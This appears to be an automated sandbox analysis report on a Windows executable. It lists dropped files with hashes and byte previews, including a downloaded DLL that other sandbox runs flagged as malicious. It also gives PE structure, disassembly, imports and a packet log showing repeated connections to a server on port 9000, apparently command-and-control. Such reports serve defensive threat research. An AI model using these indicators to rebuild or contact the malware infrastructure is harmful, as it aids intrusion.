Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.5.7.2.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERDD52.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4605
Entropy (8bit):	4.481762253623764
Encrypted:	false
SSDEEP:	48:cvIwWl8zs2Jg77aI9HhzSWpW8VYsYm8M4JTgFQV+q8wgnzgSO2d:uIjfMI7Lf7VAJZVOn/O2d
MD5:	B9D33F03AC07847C1A74E1816C865F0C
SHA1:	17AAEB63BE85042614E78C8E8221D711BFA65CB7
SHA-256:	29098E1774F6903A1DBBB85B669E95764F9493D95F097CAE0019768A69B0E879
SHA-512:	2A68292407E459486F88E982F7CA65ABFBA0AFAC5FB61C07E826BCC0C1C6F2F82D645C484C48DEC1DAAA521103D3F9F9CE5053BDC26C4A7AA1A89FFFB5329BF0
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="374622" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
Category:	dropped
Size (bytes):	71954
Entropy (8bit):	7.996617769952133
Encrypted:	true
SSDEEP:	1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
MD5:	49AEBF8CBD62D92AC215B2923FB1B9F5
SHA1:	1723BE06719828DDA65AD804298D0431F6AFF976
SHA-256:	B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
SHA-512:	BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
Malicious:	false
Preview:	MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..\|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........\|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.\|.c.&>?..^t. ..;..X.d.E.0G....[Q.,......#.Dp..L.o\|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	data
Category:	dropped
Size (bytes):	328
Entropy (8bit):	3.1356875516282012
Encrypted:	false
SSDEEP:	6:kKogna9UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:l1DnLNkPlE99SNxAhUe/3
MD5:	643A04DE806F367F95FA2C2372EAFDCE
SHA1:	690912B614D8E6C79F4788579A7F7416B33ADC70
SHA-256:	51837F0C94CE19779EFD1BDC1E37E46F06002A3D7AB02248C8FED4970831E2D5
SHA-512:	75E0579CD381174B4F406F10AE5233186608B13CA54AB860732485169DFEB78061D047DDB575C4F3A20D816BD7B5F22803A948380C1F8D2D69E8E3ABD09710B4
Malicious:	false
Preview:	p...... .........m}.E...(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\sqlt[1].dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2459136
Entropy (8bit):	6.052474106868353
Encrypted:	false
SSDEEP:	49152:WHoJ9zGioiMjW2RrL9B8SSpiCH7cuez9A:WHoJBGqabRnj8JY/9
MD5:	90E744829865D57082A7F452EDC90DE5
SHA1:	833B178775F39675FA4E55EAB1032353514E1052
SHA-256:	036A57102385D7F0D7B2DEACF932C1C372AE30D924365B7A88F8A26657DD7550
SHA-512:	0A2D112FF7CB806A74F5EC17FE097D28107BB497D6ED5AD28EA47E6795434BA903CDB49AAF97A9A99C08CD0411F1969CAD93031246DC107C26606A898E570323
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: Setup.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Win64.Malware-gen.16465.8601.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: qiHXXzgR6f.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........7.Z.Y.Z.Y.Z.Y...Z.n.Y...\..Y...]...Y...X.Y.Y.Z.X..Y.O.\.E.Y.O.].U.Y.O.Z.L.Y.l3].[.Y.l3Y.[.Y.l3..[.Y.l3[.[.Y.RichZ.Y.................PE..L...i.`e...........!...%.. .........{D........ ...............................%...........@...........................#..6....$.(.....$.......................$.....`.#.8...........................x.#.@.............$..............................text...G. ....... ................. ..`.rdata...".... ..$.... .............@..@.data...4\|... $..b....#.............@....idata........$......^$.............@..@.00cfg........$......p$.............@..@.rsrc.........$......r$.............@..@.reloc..5.....$.......$.............@..B................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.465312700633052
Encrypted:	false
SSDEEP:	6144:/IXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uNPdwBCswSbS:wXD94+WlLZMM6YFH1+S
MD5:	6D91DFAE854B49B66485D228E7E0BF0C
SHA1:	5662AFA897D945CD7F006DA86596DE6A8D3EBD95
SHA-256:	EDD8F426181C009364A73CF0F2BE9CA205BD9002CD4927F5BA159B503BA71523
SHA-512:	CAC1142CE303A9B7AE3404F49E9A5FB2B14CDAC761EB805D5FC2C3EB2C7BF37F0197CA1F3CD6AA2B80987D9FB3F70A7F2E702A1C4E7C27E15D50AAFAEBF02CDB
Malicious:	false
Preview:	regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.O#.E.................................................................................................................................................................................................................................................................................................................................................5.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.474701129164594
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	455'680 bytes
MD5:	2a042e0136d2125e744724a757f33950
SHA1:	d3f5304872ff4b795cde48914fa4d81768abba5d
SHA256:	65746b8a8fddc5dfb1602a3a5605cd039476bab5e66076bc729b987793986e0e
SHA512:	428e5cd961441fbfe4851dcef4431cad371673813028a631c5ca6cb7bda6d74d4f63b2d45689cd8d6c8cb6fc92dd1eb09bf4e307a93df1c9600c235951a4f1e8
SSDEEP:	6144:rAyIw/Vb6XOM8xYKn+TKRQGXHqF74UyM1nblXV8a0+lESfFa0l06qiXyf9RIR3pf:rAyI6b6XOMCT+B4Uyn6ESVlvqiKI5f
TLSH:	4DA4E01074828072D5A61A3306B4DBB95A7EB9344B618ECFA3D54F7EDF302C197325AB
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........bC..1C..1C..1...0R..1...0...1...0U..1.Y.0Q..1.Y.0V..1...0J..1C..1...1.Y.0...1.Z.0B..1.Z.0B..1.Z.0B..1RichC..1...............

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x40c1c7
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x6672C39D [Wed Jun 19 11:40:13 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	4d71c6568cd912923f8bc2058a57f65f

Entrypoint Preview

Instruction
call 00007F702141E599h
jmp 00007F702141DC4Fh
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+08h]
push esi
mov ecx, dword ptr [eax+3Ch]
add ecx, eax
movzx eax, word ptr [ecx+14h]
lea edx, dword ptr [ecx+18h]
add edx, eax
movzx eax, word ptr [ecx+06h]
imul esi, eax, 28h
add esi, edx
cmp edx, esi
je 00007F702141DDEBh
mov ecx, dword ptr [ebp+0Ch]
cmp ecx, dword ptr [edx+0Ch]
jc 00007F702141DDDCh
mov eax, dword ptr [edx+08h]
add eax, dword ptr [edx+0Ch]
cmp ecx, eax
jc 00007F702141DDDEh
add edx, 28h
cmp edx, esi
jne 00007F702141DDBCh
xor eax, eax
pop esi
pop ebp
ret
mov eax, edx
jmp 00007F702141DDCBh
push esi
call 00007F702141E89Fh
test eax, eax
je 00007F702141DDF2h
mov eax, dword ptr fs:[00000018h]
mov esi, 0046F3D4h
mov edx, dword ptr [eax+04h]
jmp 00007F702141DDD6h
cmp edx, eax
je 00007F702141DDE2h
xor eax, eax
mov ecx, edx
lock cmpxchg dword ptr [esi], ecx
test eax, eax
jne 00007F702141DDC2h
xor al, al
pop esi
ret
mov al, 01h
pop esi
ret
push ebp
mov ebp, esp
cmp dword ptr [ebp+08h], 00000000h
jne 00007F702141DDD9h
mov byte ptr [0046F3D8h], 00000001h
call 00007F702141E095h
call 00007F7021420EE2h
test al, al
jne 00007F702141DDD6h
xor al, al
pop ebp
ret
call 00007F702142E4A7h
test al, al
jne 00007F702141DDDCh
push 00000000h
call 00007F7021420EE9h
pop ecx
jmp 00007F702141DDBBh
mov al, 01h
pop ebp
ret
push ebp
mov ebp, esp
cmp byte ptr [0046F3D9h], 00000000h
je 00007F702141DDD6h
mov al, 01h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x38dc0	0x4c	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x38e0c	0x64	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x71000	0x206c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x36cd8	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x36c18	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2e000	0x160	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x2c360	0x2c400	48ebe9f7db94e39cc36c31d49f896c3c	False	0.5570930437853108	data	6.657127142960566	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x2e000	0xb5fc	0xb600	0cf0f9b30a372925a0871d8a6edaf1b5	False	0.42301253434065933	data	5.04202350165611	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x3a000	0x35fe8	0x34e00	4fc4cf94d711a2509e54fb9c025c868e	False	0.9842780363475178	data	7.983738010153567	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.bSs	0x70000	0x4ac	0x600	f929bf25d4c42bd01cdad568b5fe4d8a	False	0.4791666666666667	data	5.111291762588542	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0x71000	0x206c	0x2200	3e1192bfa628a7fe9ce4ea609327c4e6	False	0.7296645220588235	data	6.424471018903299	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL	Import
GDI32.dll	SetPixel
USER32.dll	GetDC, DestroyWindow, ReleaseDC
ADVAPI32.dll	GetNumberOfEventLogRecords, DeleteAce
KERNEL32.dll	WriteConsoleW, GetProcessHeap, CreateFileW, HeapSize, CloseHandle, WaitForSingleObject, CreateThread, VirtualAlloc, GetConsoleWindow, GetCurrentThreadId, WideCharToMultiByte, MultiByteToWideChar, GetStringTypeW, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionEx, DeleteCriticalSection, QueryPerformanceCounter, EncodePointer, DecodePointer, LCMapStringEx, GetSystemTimeAsFileTime, GetModuleHandleW, GetProcAddress, GetCPInfo, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, GetCurrentProcessId, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, SetStdHandle, RaiseException, RtlUnwind, GetLastError, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, GetModuleHandleExW, GetStdHandle, WriteFile, GetModuleFileNameW, ExitProcess, HeapAlloc, HeapFree, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, GetFileType, FlushFileBuffers, GetConsoleOutputCP, GetConsoleMode, ReadFile, GetFileSizeEx, SetFilePointerEx, ReadConsoleW, HeapReAlloc, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEndOfFile

Exports

Name	Ordinal	Address
AsuxuiHAuiiua	1	0x409310

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 19, 2024 14:39:59.852648020 CEST	49731	443	192.168.2.4	149.154.167.99
Jun 19, 2024 14:39:59.852751017 CEST	443	49731	149.154.167.99	192.168.2.4
Jun 19, 2024 14:39:59.852835894 CEST	49731	443	192.168.2.4	149.154.167.99
Jun 19, 2024 14:39:59.887254000 CEST	49731	443	192.168.2.4	149.154.167.99
Jun 19, 2024 14:39:59.887291908 CEST	443	49731	149.154.167.99	192.168.2.4
Jun 19, 2024 14:40:00.527199030 CEST	443	49731	149.154.167.99	192.168.2.4
Jun 19, 2024 14:40:00.527314901 CEST	49731	443	192.168.2.4	149.154.167.99
Jun 19, 2024 14:40:00.591753006 CEST	49731	443	192.168.2.4	149.154.167.99
Jun 19, 2024 14:40:00.591808081 CEST	443	49731	149.154.167.99	192.168.2.4
Jun 19, 2024 14:40:00.592763901 CEST	443	49731	149.154.167.99	192.168.2.4
Jun 19, 2024 14:40:00.592848063 CEST	49731	443	192.168.2.4	149.154.167.99
Jun 19, 2024 14:40:00.594978094 CEST	49731	443	192.168.2.4	149.154.167.99
Jun 19, 2024 14:40:00.636522055 CEST	443	49731	149.154.167.99	192.168.2.4
Jun 19, 2024 14:40:00.779308081 CEST	443	49731	149.154.167.99	192.168.2.4
Jun 19, 2024 14:40:00.779371977 CEST	443	49731	149.154.167.99	192.168.2.4
Jun 19, 2024 14:40:00.779407978 CEST	49731	443	192.168.2.4	149.154.167.99
Jun 19, 2024 14:40:00.779475927 CEST	443	49731	149.154.167.99	192.168.2.4
Jun 19, 2024 14:40:00.779525042 CEST	49731	443	192.168.2.4	149.154.167.99
Jun 19, 2024 14:40:00.779550076 CEST	49731	443	192.168.2.4	149.154.167.99
Jun 19, 2024 14:40:00.779562950 CEST	443	49731	149.154.167.99	192.168.2.4
Jun 19, 2024 14:40:00.779639959 CEST	49731	443	192.168.2.4	149.154.167.99
Jun 19, 2024 14:40:00.781646013 CEST	49731	443	192.168.2.4	149.154.167.99
Jun 19, 2024 14:40:00.781682014 CEST	443	49731	149.154.167.99	192.168.2.4
Jun 19, 2024 14:40:00.787695885 CEST	49733	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:00.792666912 CEST	9000	49733	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:00.792748928 CEST	49733	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:00.793065071 CEST	49733	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:00.797921896 CEST	9000	49733	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:01.438410044 CEST	9000	49733	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:01.438441992 CEST	9000	49733	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:01.438474894 CEST	49733	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:01.438524961 CEST	49733	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:02.400815964 CEST	49733	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:02.405736923 CEST	9000	49733	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:02.592015982 CEST	9000	49733	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:02.592123032 CEST	49733	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:02.592550993 CEST	49733	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:02.597348928 CEST	9000	49733	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:03.043494940 CEST	9000	49733	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:03.043572903 CEST	49733	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:03.047522068 CEST	49738	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:03.052671909 CEST	9000	49738	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:03.052781105 CEST	49738	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:03.053028107 CEST	49738	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:03.058120012 CEST	9000	49738	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:03.684803963 CEST	9000	49738	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:03.684912920 CEST	49738	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:03.692576885 CEST	49738	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:03.697453022 CEST	9000	49738	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:03.731571913 CEST	49738	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:03.738267899 CEST	9000	49738	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:04.312442064 CEST	9000	49738	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:04.312650919 CEST	49738	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:04.313782930 CEST	49733	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:04.314119101 CEST	49741	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:04.319207907 CEST	9000	49733	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:04.319266081 CEST	9000	49741	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:04.319297075 CEST	49733	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:04.319340944 CEST	49741	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:04.319617987 CEST	49741	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:04.325268030 CEST	9000	49741	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:04.976289988 CEST	9000	49741	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:04.976355076 CEST	49741	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:04.976794958 CEST	49741	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:04.978588104 CEST	49741	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:04.981465101 CEST	9000	49741	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:04.983596087 CEST	9000	49741	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:05.671540976 CEST	9000	49741	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:05.671556950 CEST	9000	49741	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:05.671566010 CEST	9000	49741	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:05.671673059 CEST	49741	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:05.673285007 CEST	49738	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:05.673738003 CEST	49742	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:05.680844069 CEST	9000	49742	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:05.680927992 CEST	49742	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:05.681200027 CEST	49742	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:05.681315899 CEST	9000	49738	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:05.681360960 CEST	49738	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:05.685951948 CEST	9000	49742	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:06.321352959 CEST	9000	49742	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:06.321444035 CEST	49742	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:06.321836948 CEST	49742	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:06.326610088 CEST	9000	49742	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:06.347815990 CEST	49742	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:06.352690935 CEST	9000	49742	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:06.949598074 CEST	9000	49742	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:06.949621916 CEST	9000	49742	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:06.949632883 CEST	9000	49742	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:06.949640989 CEST	9000	49742	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:06.949646950 CEST	9000	49742	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:06.949807882 CEST	49742	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:06.949807882 CEST	49742	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:06.951541901 CEST	49741	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:06.952148914 CEST	49744	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:06.956809998 CEST	9000	49741	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:06.956892014 CEST	49741	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:06.958511114 CEST	9000	49744	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:06.958599091 CEST	49744	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:06.958859921 CEST	49744	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:06.963690996 CEST	9000	49744	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:07.638005972 CEST	9000	49744	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:07.638242960 CEST	49744	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:07.638607979 CEST	49744	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:07.640208960 CEST	49744	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:07.643646955 CEST	9000	49744	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:07.645057917 CEST	9000	49744	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:08.279824018 CEST	9000	49744	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:08.279988050 CEST	49744	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:08.355429888 CEST	49742	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:08.355869055 CEST	49746	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:08.360871077 CEST	9000	49746	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:08.360937119 CEST	49746	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:08.361017942 CEST	9000	49742	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:08.361071110 CEST	49742	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:08.361372948 CEST	49746	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:08.366250992 CEST	9000	49746	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:09.017683983 CEST	9000	49746	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:09.017755985 CEST	49746	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:09.018263102 CEST	49746	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:09.020572901 CEST	49746	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:09.020623922 CEST	49746	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:09.023408890 CEST	9000	49746	162.55.53.18	192.168.2.4
